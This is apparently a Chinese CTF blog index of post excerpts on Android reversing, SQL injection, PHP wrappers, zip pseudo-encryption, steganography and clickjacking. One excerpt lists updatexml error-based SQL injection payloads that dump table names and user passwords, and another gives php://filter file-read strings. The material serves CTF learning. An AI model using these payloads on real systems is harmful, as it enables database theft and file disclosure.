摘要:
这似乎是一道安卓逆向题??我就是没有搞懂安卓逆向原来是misc吗... 安卓逆向一个例子 #工具准备 1.apktool——可以反编译软件的布局文件、图片等资源,方便大家学习一些很好的布局; 2.dex2jar——将apk反编译成java源码(classes.dex转化成jar文件); 3.jd-g 阅读全文
摘要:
aaencode:http://www.atoolbox.net/Tool.php?Id=703
颜文字加密 阅读全文
摘要:
注入点在cookie;
工具:火狐插件:Edit This Cookie 阅读全文
摘要:
session.auto_start=0 修改为 session.auto_start=1;
output_buffering = Off 修改为 output_buffering = On; 阅读全文
摘要:
updatexml(1,concat(0x7e,(select database()),0x7e),1)
updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)
updatexml(1,concat(0x7e,(select group_concat( column_name ) from information_schema.columns where table_name='users'),0x7e),1)
updatexml(1,concat(0x7e,(select substr((select group_concat(id,0x3a,username,0x3a,password) from security.users),1,20)),0x7e),1) 阅读全文
摘要:
知识点
1.data://text/plain;base64,数据(base64加密后)
2.php://filter/read=convert.base64-encode/resource=文件名 阅读全文
摘要:
[RoarCTF 2019]Easy Calc #题目 题目打开是这样的 查看源码 .ajax是指通过http请求加载远程数据。 可以发现有一个calc.php,输入的算式会被传入到这个php文件里,尝试一下能不能打开 可以打开,并且显示了源码 foreach 语法结构提供了遍历数组的简单方式。 语 阅读全文
摘要:
#0x01 知识点 伪加密 steghide提取信息 #0x02 伪加密的判断 首先,在winhex分析,发现有4个zip文件的文件头和2个文件尾,有完整文件头尾那么可以直接修改后缀为zip解压, 查看一下压缩包里的文件,发现有加密,继续分析zip的部分 我们仔细看一下这一部分,会发现存在一个伪加密 阅读全文
摘要:
题目:bugku Misc论剑 第一步:在winhex里分析 发现文件头有两个 两个jpg文件中间还有一段二进制码 在kali里分离出两个一样jpg图片,但是没有什么发现 二进制码解出来也没有flag 然后就没有了思路。。。 找到网上的wp做了一遍,收获很多 修改jpg的宽高:FF C2 XX XX 阅读全文
摘要:
点击劫持的小实验 阅读全文